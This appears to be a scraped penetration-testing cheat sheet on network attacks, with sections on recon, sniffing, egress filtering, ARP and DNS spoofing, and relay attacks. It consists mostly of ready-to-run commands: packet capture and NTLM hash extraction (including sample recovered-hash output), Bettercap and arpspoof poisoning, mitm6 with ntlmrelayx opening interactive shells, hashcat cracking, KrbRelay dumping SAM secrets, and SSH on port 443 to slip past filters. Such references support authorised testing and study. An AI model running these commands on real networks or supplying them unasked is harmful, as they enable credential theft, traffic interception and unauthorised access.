Network Attacks
Network Recon
Host Discoverybash find_cidrs.sh eth0
Dismap
NetScan - From Windows Host
Sniffing
Wireshark or tcpdump - Credentials in clear text ?
tcpdump -i eth0 -w packets.pcap -s 0Extract NTLMv1, etc
python3 ./Pcredz -f ../NTLMv1.pcapng Extract NTLMv2
# ./NTLMRawUnHide.py -i ../NTLMv2.pcap
/%(
-= Find NTLMv2 =- ,@@@@@@@@&
/%&@@@@&, -= hashes w/ =- %@@@@@@@@@@@*
(@@@@@@@@@@@( -= NTLMRawUnHide.py =- *@@@@@@@@@@@@@@@.
&@@@@@@@@@@@@@@&. @@@@@@@@@@@@@@@@@@(
,@@@@@@@@@@@@@@@@@@@/ .%@@@@@@@@@@@@@@@@@@@@@
/@@@@@@@#&@&*.,/@@@@(. ,%@@@@&##(%@@@@@@@@@.
(@@@@@@@(##(. .#&@%%( .&&@@&( ,/@@@@@@#
%@@@@@@&*/((. #( ,(@& ,%@@@@@@*
@@@@@@@&,/(* , .,&@@@@@#
@@@@@@@/*//, .,,,**
.,, ...
.#@@@@@@@(.
/@@@@@@@@@@@&
.@@@@@@@@@@@*
.(&@@@%/. ..
(@@& %@@. .@@@,
/@@# @@@, %@&
&@@&. @@@/ @@@#
. %@@@( ,@@@# @@@( ,
*@@/ .@@@@@( #@%
*@@%. &@@@@@@@@, /@@@.
.@@@@@@@@@@@&. .*@@@@@@@@@@@/.
.%@@@@%, /%@@@&(.
<-SNIP->
Found NTLMSSP Message Type 1 : Negotiation
Found NTLMSSP Message Type 1 : Negotiation
Found NTLMSSP Message Type 2 : Challenge
> Server Challenge : 9859cf3a459c3365
Found NTLMSSP Message Type 2 : Challenge
> Server Challenge : 9859cf3a459c3365
Found NTLMSSP Message Type 3 : Authentication
> Domain : DOMAIN
> Username : username
> Workstation : DESKTOP-XXXXXX
NTLMv2 Hash recovered:
username::DOMAIN:9859cf3a459c3365:2b56<-SNIP->52c21:0101000000000000868e5cd5587fd<-SNIP->ec730634c50a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00320038002e003100330036000000000000000000NFS Data Extraction
Finding vulnerabilities - Above
Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise in the air. He’s invisible.
Convert pcapng to pcap
tshark -F pcap -r NTLMv2.pcapng -w NTLMv2.pcapOpen outbound ports / Filtering
Web content filtering
For example, try to connect to 4chan or exploit-db with CLI but also with a browser
Living Off Trusted Sites
Try to access some of LOTS
Port Filtering
Test for other ports: 22, 21, 23, etc.
$ports = @(20, 21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 8080)
$hostname = "portquiz.net"
foreach ($port in $ports) {
$result = Test-NetConnection -ComputerName $hostname -Port $port -InformationLevel Detailed
if ($result.TcpTestSucceeded) {
Write-Output "Port $port is open on $hostname"
}
}
Protocol Filtering
For example, if port 22 is blocked, also test for protocol filtering: SSH on port 443 ?
Server side:
sudo nano /etc/ssh/sshd_config
# Add or change port
Port 443
# Restart SSH
sudo systemctl restart ssh
# or
sudo service ssh restart
# If nesserary open port 443
sudo ufw allow 443/tcpTry to connect over port 443
ssh -p 443 username@server_ipThe Protocol Filter feature is used to block unwanted traffic from your network. The feature is commonly used to make sure employees, students or end users are using their Internet access for its intended productive use. The filter can block dozens of different protocols, including: peer-to-peer traffic (Source: ClearOS)
ARP - DNS Spoofing
Bettercap
Standalone version:
wget https://github.com/bettercap/bettercap/releases/download/v2.31.1/bettercap_linux_amd64_v2.31.1.ziproot@box:/tmp# apt install libpcap-dev
root@box:/tmp# apt install libusb-1.0-0
root@box:/tmp#apt install libnetfilter-queue1
root@box:/tmp#apt install iproute2# Host discovery
net.probe on
# See all host
net.show
# ARP spoof
set arp.spoof.targets 192.168.37.133
arp.spoof on
# Spoof the entire subnet /!\ not recommended
set arp.spoof targets
# By default only connections to and from the external network will be spoofed
# Spoof internal connection
set arp.spoof.internal
# Capture data
net.sniff on
# Save the captured packet to pcap
set net.sniff.output filename.pcap
# DNS spoofing
set dns.spoof.domains github.com
dns.spoof.onArpspoof
$ apt install dsniff
$ apt-get install tcpdump
$ arpspoof -i eth0 -t [IP1] [IP2]
$ arpspoof -i eth0 -t [IP2] [IP1]
$ tcpdump -i eth0 host [IP1] or host [IP2] -w capture.pcapEavesarp
Detect and exploit Stale Network Address Configurations (SNACs) via network traffic analysis and ARP poisoning techniques
LLMNR NBT-NS Poisoning
LLMNR NBT-NS PoisoningADIDNS Spoofing
ADIDNS SpoofingMITM6
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-accessntlmrelayx.py -6 -wh 192.168.1.6 -tf target.txt -socks -debug -smb2supportMITM MySQL
Use CredSLayer to extract salts and password hash
$mysqlna$<Salt1><Salt2>*<password_hash>hashcat -a 0 -m 11200 hash.mysqlMITM - ASReproast
MisconfigurationMITM - Kerberoast
KerberoastNo LDAP Signing - KrbRelayUp
No-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
KrbRelay
Cross-session attack:
KrbRelay.exe -s <SESSION-ID> -clsid 354FF91B-5E49-4BDC-A8E6-1CB6C6877182 -ntlm
Read out local SAM database hashes:
KrbRelay.exe -cslid F8842F8E-DAFE-4B37-9D38-4E0714A61149 -session <TARGET-SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -secrets
Relaying Kerberos to SMB for remote access:
KrbRelay.exe -cslid f8842f8e-dafe-4b37-9d38-4e0714a61149 -session <SESSION-ID> -spn cifs/<TARGET-SYSTEM>.<DOMAIN> -console
NTLM Relay
SMB (445, 139) / RPCAD CSKerberos Relay
Over HTTP
Over SMB
SMB (445, 139) / RPCAD CS
Via DHCPv6-DNS-Takeover
Last updated